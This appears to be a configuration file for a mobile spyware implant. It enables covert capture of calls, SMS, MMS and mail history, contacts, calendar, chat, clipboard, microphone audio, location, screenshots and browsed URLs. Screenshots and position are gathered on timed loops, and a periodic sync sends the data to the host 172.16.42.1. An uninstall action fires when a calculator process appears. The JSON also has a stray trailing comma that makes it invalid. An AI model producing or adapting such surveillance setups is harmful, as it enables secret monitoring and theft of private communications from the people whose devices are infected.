{
    "modules": [
        {"module": "addressbook"},
        {"module": "application"},
        {"module": "calendar"},
        {"buffer": 512000, "module": "call", "compression": 5, "record": true},
        {"module": "chat"},
        {"module": "clipboard"},
        {
            "camera": true,
            "module": "crisis",
            "call": true,
            "mic": true,
            "synchronize": false,
            "hook": {"processes": [], "enabled": true},
            "position": true,
            "network": {"processes": [], "enabled": false}
        },
        {"list": false, "module": "device"},
        {
            "module": "messages",
            "mms": {
                "filter": {"dateto": "2100-01-01 00:00:00", "datefrom": "2012-04-13 00:00:00", "history": true},
                "enabled": true
            },
            "sms": {
                "filter": {"dateto": "2100-01-01 00:00:00", "datefrom": "2012-04-13 00:00:00", "history": true},
                "enabled": true
            },
            "mail": {
                "filter": {
                    "datefrom": "2012-04-13 00:00:00",
                    "dateto": "2100-01-01 00:00:00",
                    "maxsize": 100000,
                    "history": true
                },
                "enabled": true
            }
        },
        {"autosense": false, "module": "mic", "silence": 5, "threshold": 0.22},
        {"module": "position", "cell": true, "gps": false, "wifi": true},
        {"quality": "med", "module": "screenshot", "onlywindow": false},
        {"module": "url"}
    ],
    "actions": [
        {
            "subactions": [
                {"status": "start", "action": "module", "module": "device"},
                {"status": "start", "action": "module", "module": "call"},
                {"status": "start", "action": "module", "module": "calendar"},
                {"status": "start", "action": "module", "module": "addressbook"},
                {"status": "start", "action": "module", "module": "messages"},
                {"status": "start", "action": "module", "module": "chat"},
                {"status": "start", "action": "module", "module": "url"},
                {"status": "start", "action": "module", "module": "application"},
               
            ],
            "desc": "STARTUP"
        },
        {
            "subactions": [{"status": "start", "action": "module", "module": "screenshot"}],
            "desc": "SCREENSHOT"
        },
        {"subactions": [{"status": "start", "action": "module", "module": "position"}], "desc": "POSITION"},
        {
            "subactions": [
                {
                    "stop": false,
                    "bandwidth": 500000,
                    "cell": false,
                    "mindelay": 0,
                    "maxdelay": 0,
                    "host": "172.16.42.1",
                    "action": "synchronize",
                    "wifi": true
                }
            ],
            "desc": "SYNC"
        },
        {"subactions": [{"action": "uninstall"}], "desc": ""}
    ],
    "events": [
        {
            "desc": "STARTUP",
            "enabled": true,
            "event": "timer",
            "start": 0,
            "subtype": "loop",
            "te": "23:59:59",
            "ts": "00:00:00"
        },
        {
            "desc": "SCREENSHOT",
            "delay": 30,
            "enabled": true,
            "event": "timer",
            "repeat": 1,
            "start": 1,
            "subtype": "loop",
            "te": "23:59:59",
            "ts": "00:00:00"
        },
        {
            "desc": "POSITION",
            "delay": 60,
            "enabled": true,
            "event": "timer",
            "repeat": 2,
            "start": 2,
            "subtype": "loop",
            "te": "23:59:59",
            "ts": "00:00:00"
        },
        {
            "delay": 60,
            "enabled": true,
            "event": "timer",
            "repeat": 3,
            "desc": "SYNC",
            "subtype": "loop",
            "te": "23:59:59",
            "ts": "00:00:00"
        },
        {
            "desc": "",
            "enabled": true,
            "event": "process",
            "process": "*calc*",
            "start": 4,
            "window": false,
            "focus": false
        }
    ],
    "globals": {
        "collapsed": false,
        "quota": {"max": 100000000, "min": 100000000},
        "wipe": false,
        "remove_driver": true,
        "advanced": true,
        "nohide": [],
        "type": "mobile"
    }
}